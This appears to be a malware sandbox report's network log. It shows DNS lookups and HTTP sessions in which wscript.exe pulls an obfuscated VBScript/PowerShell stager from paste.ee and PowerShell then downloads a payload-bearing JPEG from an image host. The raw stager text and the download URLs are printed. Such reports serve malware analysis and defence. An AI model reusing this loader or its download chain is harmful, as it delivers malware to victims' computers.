        May 27, 2024 15:21:33.892788887 CEST53502201.1.1.1192.168.2.5
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        May 27, 2024 15:20:58.441070080 CEST192.168.2.51.1.1.10x343dStandard query (0)paste.eeA (IP address)IN (0x0001)false
        May 27, 2024 15:21:01.940035105 CEST192.168.2.51.1.1.10x2c86Standard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
        May 27, 2024 15:21:16.275051117 CEST192.168.2.51.1.1.10x3061Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
        May 27, 2024 15:21:33.885876894 CEST192.168.2.51.1.1.10x32b9Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        May 27, 2024 15:20:58.451663971 CEST1.1.1.1192.168.2.50x343dNo error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
        May 27, 2024 15:20:58.451663971 CEST1.1.1.1192.168.2.50x343dNo error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
        May 27, 2024 15:21:01.992952108 CEST1.1.1.1192.168.2.50x2c86No error (0)uploaddeimagens.com.br188.114.97.3A (IP address)IN (0x0001)false
        May 27, 2024 15:21:01.992952108 CEST1.1.1.1192.168.2.50x2c86No error (0)uploaddeimagens.com.br188.114.96.3A (IP address)IN (0x0001)false
        May 27, 2024 15:21:16.286309958 CEST1.1.1.1192.168.2.50x3061No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
        May 27, 2024 15:21:16.286309958 CEST1.1.1.1192.168.2.50x3061No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
        May 27, 2024 15:21:16.286309958 CEST1.1.1.1192.168.2.50x3061No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
        May 27, 2024 15:21:16.286309958 CEST1.1.1.1192.168.2.50x3061No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
        May 27, 2024 15:21:16.286309958 CEST1.1.1.1192.168.2.50x3061No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
        May 27, 2024 15:21:33.892788887 CEST1.1.1.1192.168.2.50x32b9Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
        • paste.ee
        • uploaddeimagens.com.br
        • cdn.discordapp.com
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.549704188.114.97.34433628C:\Windows\System32\wscript.exe
        TimestampBytes transferredDirectionData
        2024-05-27 13:20:58 UTC319OUTGET /d/Vm93m HTTP/1.1
        Accept: */*
        Accept-Language: en-ch
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: paste.ee
        Connection: Keep-Alive
        2024-05-27 13:20:59 UTC1232INHTTP/1.1 200 OK
        Date: Mon, 27 May 2024 13:20:59 GMT
        Content-Type: text/plain; charset=utf-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=2592000
        strict-transport-security: max-age=63072000
        x-frame-options: DENY
        x-content-type-options: nosniff
        x-xss-protection: 1; mode=block
        content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pGIJL1HIQ6Q2pwDTpinWYFBdHi2XJthUeJGQYt9ryZOu2i83rjRtFM1Or512kG0G2Et8zRGk%2F3jy%2FGOrIOkuANoUgNhjnDmJGzqF5QbUO5picw4jlqAVRiknOg%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 88a64e310d9d1768-EWR
        alt-svc: h3=":443"; ma=86400
        2024-05-27 13:20:59 UTC137INData Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 64 65 73 61 66 69 61 72 20 2c 20 70 65 63 68 65 6c 69 6e 67 75 65 73 20 2c 20 62 69 7a 61 72 72 61 6d 65 6e 74 65 20 2c 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 2c 20 6d 65 73 6f 73 74 65 72 6e 6f 20 2c 20 43 61 6d 61 20 2c 20 6d 65 73 6f 73 74 65 72 6e 6f 31 0d 0a 20 20 20 20 20 70 65 63 68 65 6c 69 6e 67 75 65 73 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20
        Data Ascii: 1f7f dim desafiar , pechelingues , bizarramente , providencial , mesosterno , Cama , mesosterno1 pechelingues = " "
        2024-05-27 13:20:59 UTC1369INData Raw: 62 69 7a 61 72 72 61 6d 65 6e 74 65 20 20 3d 20 22 22 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 70 65 63 68 65 6c 69 6e 67 75 65 73 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67
        Data Ascii: bizarramente = "" & providencial & pechelingues & providencial & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDg
        2024-05-27 13:20:59 UTC1369INData Raw: 4d 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 38 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 77 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 4c 51 42 53 44 67 54 72 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44
        Data Ascii: MDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnD
        2024-05-27 13:20:59 UTC1369INData Raw: 51 44 67 54 72 65 22 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 70 65 63 68 65 6c 69 6e 67 75 65 73 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 22 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 49 44 67 54 72 65 42 39 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 77 44 67 54 72 65 61 51 42 75 44 67 54 72 65 47 73 44 67 54 72 65 63 77 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 42 44 67 54 72 65 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72
        Data Ascii: QDgTre" & providencial & pechelingues & providencial & "QBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTr
        2024-05-27 13:20:59 UTC1369INData Raw: 44 67 54 72 65 33 44 67 54 72 65 44 67 44 67 54 72 65 4e 51 44 67 54 72 65 76 44 67 54 72 65 44 63 44 67 54 72 65 4d 67 44 67 54 72 65 77 44 67 54 72 65 43 38 44 67 54 72 65 62 77 42 79 44 67 54 72 65 47 6b 44 67 54 72 65 22 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 70 65 63 68 65 6c 69 6e 67 75 65 73 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 22 77 42 70 44 67 54 72 65 47 34 44 67 54 72 65 59 51 42 73 44 67 54 72 65 43 38 44 67 54 72 65 62 67 42 6c 44 67 54 72 65 48 63 44 67 54 72 65 58 77 42 70 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 4c 67 42 71 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 22 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 70 65 63 68 65 6c 69 6e 67 75 65 73 20
        Data Ascii: DgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTre" & providencial & pechelingues & providencial & "wBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTre" & providencial & pechelingues
        2024-05-27 13:20:59 UTC1369INData Raw: 55 44 67 54 72 65 45 59 44 67 54 72 65 4f 44 67 54 72 65 44 67 54 72 65 75 44 67 54 72 65 45 63 44 67 54 72 65 22 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 70 65 63 68 65 6c 69 6e 67 75 65 73 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 22 51 42 30 44 67 54 72 65 46 4d 44 67 54 72 65 64 44 67 54 72 65 42 79 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 70 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 51 67 42 35 44 67 54 72 65 48 51 44 67 54 72 65 22 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 70 65 63 68 65 6c 69 6e 67 75 65 73 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 22 51 42 7a 44 67 54 72 65 43 6b 44 67 54 72 65
        Data Ascii: UDgTreEYDgTreODgTreDgTreuDgTreEcDgTre" & providencial & pechelingues & providencial & "QB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTre" & providencial & pechelingues & providencial & "QBzDgTreCkDgTre
        2024-05-27 13:20:59 UTC1089INData Raw: 65 46 51 44 67 54 72 65 22 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 70 65 63 68 65 6c 69 6e 67 75 65 73 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 22 51 42 34 44 67 54 72 65 48 51 44 67 54 72 65 4c 67 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 70 65 63 68 65 6c 69 6e 67 75 65 73 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 54 77 42 6d 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 70 65 63 68 65 6c 69 6e 67 75 65 73 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 22 44 67 54 72 65 42 47 44 67 54 72
        Data Ascii: eFQDgTre" & providencial & pechelingues & providencial & "QB4DgTreHQDgTreLgBJDgTreG4DgTre" & providencial & pechelingues & providencial & "DgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTre" & providencial & pechelingues & providencial & "DgTreBGDgTr
        2024-05-27 13:20:59 UTC1369INData Raw: 31 64 66 65 0d 0a 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 47 44 67 54 72 65 47 77 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 43 34 44 67 54 72 65 54 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 70 65 63 68 65 6c 69 6e 67 75 65 73 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 22 77 42 30 44 67 54 72 65 47 67 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 59 67 42 68 44 67 54 72 65 48 4d 44 67 54 72 65 22 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 70 65 63 68 65 6c 69 6e 67 75 65 73 20 26 20 70 72 6f
        Data Ascii: 1dfegTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTre" & providencial & pechelingues & providencial & "wB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTre" & providencial & pechelingues & pro
        2024-05-27 13:20:59 UTC1369INData Raw: 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 57 77 42 54 44 67 54 72 65 48 6b 44 67 54 72 65 63 77 42 30 44 67 54 72 65 47 55 44 67 54 72 65 62 51 44 67 54 72 65 75 44 67 54 72 65 45 4d 44 67 54 72 65 62 77 42 75 44 67 54 72 65 48 59 44 67 54 72 65 22 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 70 65 63 68 65 6c 69 6e 67 75 65 73 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 22 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 58 51 44 67 54 72 65 36 44 67 54 72 65 44 6f 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 43 44 67 54 72 65 47 45 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 44 59 44 67 54 72 65 4e 44 67 54 72 65 42 54 44 67 54 72 65 48 51 44 67 54 72 65 63 67 42 70 44 67 54 72 65 47 34 44 67 54 72 65 22
        Data Ascii: 9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTre" & providencial & pechelingues & providencial & "QByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTre"
        2024-05-27 13:20:59 UTC1369INData Raw: 43 34 44 67 54 72 65 56 67 42 43 44 67 54 72 65 43 34 44 67 54 72 65 53 44 67 54 72 65 42 76 44 67 54 72 65 47 30 44 67 54 72 65 22 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 70 65 63 68 65 6c 69 6e 67 75 65 73 20 26 20 70 72 6f 76 69 64 65 6e 63 69 61 6c 20 26 20 22 51 44 67 54 72 65 6e 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 62 51 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 42 76 44 67 54 72 65 47 51 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 30 44 67 54 72 65 48 6b 44 67 54 72 65 63 44 67 54 72 65 42 6c 44 67 54 72 65 43 34 44 67 54 72 65 52 77 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 54 51 42
        Data Ascii: C4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTre" & providencial & pechelingues & providencial & "QDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQB


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.549705188.114.97.34431360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        TimestampBytes transferredDirectionData
        2024-05-27 13:21:02 UTC124OUTGET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1
        Host: uploaddeimagens.com.br
        Connection: Keep-Alive
        2024-05-27 13:21:02 UTC701INHTTP/1.1 200 OK
        Date: Mon, 27 May 2024 13:21:02 GMT
        Content-Type: image/jpeg
        Content-Length: 4201093
        Connection: close
        Last-Modified: Tue, 21 May 2024 16:07:14 GMT
        ETag: "664cc6b2-401a85"
        Cache-Control: max-age=2678400
        CF-Cache-Status: HIT
        Age: 3269
        Accept-Ranges: bytes
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y3FKY6CuMoMq%2BtooEc93sPOGlgs%2BHM4hD%2FKJzQNeI6k6oC3f0SSsFWluyxEqnYp89h1MCq9Q%2BNifVYHy95UKAo5BJAjK%2BSsCcIGUqepyQpTqrBdq4FXBZnurczm%2F6FMhJwmX0B1drMg9"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 88a64e471f00c347-EWR
        alt-svc: h3=":443"; ma=86400
        2024-05-27 13:21:02 UTC668INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
        2024-05-27 13:21:02 UTC1369INData Raw: 02 ac c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5
        Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
        2024-05-27 13:21:02 UTC1369INData Raw: 48 f4 c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4
        Data Ascii: HVH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg
        2024-05-27 13:21:02 UTC1369INData Raw: 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a
        Data Ascii: -\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a
        2024-05-27 13:21:02 UTC1369INData Raw: d7 07 8b 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8
        Data Ascii: >2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b
        2024-05-27 13:21:02 UTC1369INData Raw: 1b 3a cd 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1
        Data Ascii: :4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>i
        2024-05-27 13:21:02 UTC1369INData Raw: 5a b4 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 